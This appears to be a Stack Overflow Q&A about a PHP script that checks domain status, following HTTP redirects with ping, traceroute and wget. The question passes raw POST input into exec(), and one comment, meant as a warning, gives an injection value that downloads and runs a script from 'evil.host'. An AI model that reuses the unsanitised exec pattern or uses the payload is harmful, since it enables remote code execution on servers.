# Get Host's IP Address and HTTP Status, following redirects

Tags: php, ssh, http-status-codes

I'm building a little web app that will ping an array of domains and return their status, letting me monitor if they're up or down, pointing to the right servers, etc. ([live example that may or may not be working](http://www.permissiondenied.net/status/?so))

I started out using `exec("ping -n 3 -w 3 {$_POST['host']}", $output, $status);` and am now using `exec("traceroute -w 1 {$_POST['host']}", $output, $status);` and grabbing the last `$output` and matching the IP there.

This works for the most part except I'm noticing it's not following 301 redirects, etc.

For example a traceroute on `myrayhawk.com` yields something like:

```
 1  192.168.1.1 (192.168.1.1)  0.495 ms  0.683 ms  0.911 ms
 2  10.71.96.1 (10.71.96.1)  32.220 ms  55.987 ms  57.109 ms
 3  ip68-4-12-93.oc.oc.cox.net (68.4.12.93)  58.231 ms  59.353 ms  60.424 ms
 4  68.4.15.242 (68.4.15.242)  72.339 ms  73.451 ms  74.641 ms
 5  ip68-4-11-16.oc.oc.cox.net (68.4.11.16)  76.265 ms  77.383 ms  79.591 ms
 6  ip68-4-11-94.oc.oc.cox.net (68.4.11.94)  143.201 ms  18.749 ms  41.717 ms
 7  langbprj01-ae1.rd.la.cox.net (68.1.1.13)  42.843 ms  43.971 ms  68.194 ms
 8  reserved.metro.la.ipv4.godaddy.com (206.223.123.32)  45.094 ms  70.501 ms  69.329 ms
 9  ip-97-74-253-94.ip.secureserver.net (97.74.253.94)  71.622 ms  72.754 ms  74.844 ms
10  ip-97-74-253-94.ip.secureserver.net (97.74.253.94)  108.322 ms  112.058 ms  109.446 ms

11  ip-97-74-253-98.ip.secureserver.net (97.74.253.98)  110.589 ms  37.376 ms  38.861 ms
12  ip-97-74-254-134.ip.secureserver.net (97.74.254.134)  68.868 ms  70.791 ms  72.282 ms
13  ip-184-168-86-185.ip.secureserver.net (184.168.86.185)  82.400 ms  76.183 ms  78.540 ms
```

But doing the same on `rayhawk.com` since I know there's a 301 redirect in there:

```
 1  192.168.1.1 (192.168.1.1)  0.738 ms  0.868 ms  1.174 ms
 2  10.71.96.1 (10.71.96.1)  95.723 ms  119.914 ms  122.994 ms
 3  ip68-4-12-89.oc.oc.cox.net (68.4.12.89)  123.558 ms  124.115 ms  124.679 ms
 4  68.4.15.240 (68.4.15.240)  127.319 ms  127.933 ms  128.523 ms
 5  ip68-4-11-16.oc.oc.cox.net (68.4.11.16)  126.672 ms  132.373 ms  131.802 ms
 6  ip68-4-11-94.oc.oc.cox.net (68.4.11.94)  130.986 ms  65.913 ms  64.542 ms
 7  langbprj01-ae1.rd.la.cox.net (68.1.1.13)  89.395 ms  88.751 ms  88.113 ms
 8  reserved.metro.la.ipv4.godaddy.com (206.223.123.32)  97.840 ms  89.999 ms  90.593 ms
 9  po36.trma0202-01.bbn.mgmt.phx3.gdg (216.69.188.33)  98.454 ms  99.034 ms  115.921 ms
10  po36.trma0202-01.bbn.mgmt.phx3.gdg (216.69.188.33)  114.698 ms  114.032 ms  115.263 ms
11  * * *
12  * * *
13  * * *
14  * * *
15  * * *
```

I've tried using `wget --spider hostname.com` but `wget` doesn't like to work nicely in php `exec()` calls.

When doing a `wget` in plain SSH I get:

```
Resolving rayhawk.com... 72.167.131.159
Connecting to rayhawk.com|72.167.131.159|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.rayhawk.com/ [following]
Spider mode enabled. Check if remote file exists.
--2012-04-12 11:37:42--  http://www.rayhawk.com/
Resolving www.rayhawk.com... 72.167.131.159
Connecting to www.rayhawk.com|72.167.131.159|:80... connected.
HTTP request sent, awaiting response... 200 OK
```

And could then parse out the stuff I wanted.

How can I resolve the final location of a host and retrieve it's HTTP status code in PHP?

Comment: ping/traceroute have no knowledge of http redirects. they're on a completely different level of the network stack. You're basically just doing DNS operations.

Comment: Tell me the URL for the script containing `exec("traceroute -w 1 {$_POST['host']}", $output, $status);`. I'll then call it with `host=; wget http://evil.host/evil.sh; chmod +x evil.sh; ./evil.sh`

Answer (score 1, accepted):

I've written a blog post about how to get the trail of HTTP redirects that can happen, it comes with code examples:

- [HEAD first with PHP Streams](http://hakre.wordpress.com/2011/09/17/head-first-with-php-streams/) + [Updated codepad viper example](http://codepad.viper-7.com/bO1HOi)

Example output for `http://example.com/`:

```
Status code (after all redirects): 200
Number of responses: 2 (1 Redirect(s))
* http://example.com/ -- 302 --> http://www.iana.org/domains/example/
```

You find a more in depth discussion of the code in [the answer to a related question *HTTP response code after redirect*](https://stackoverflow.com/a/7566440/367456).

Comment: You mean to resolve the names to IPs? Well there is [`gethostbyname`](http://php.net/gethostbyname) and naturally [`parse_url`](http://php.net/parse_url).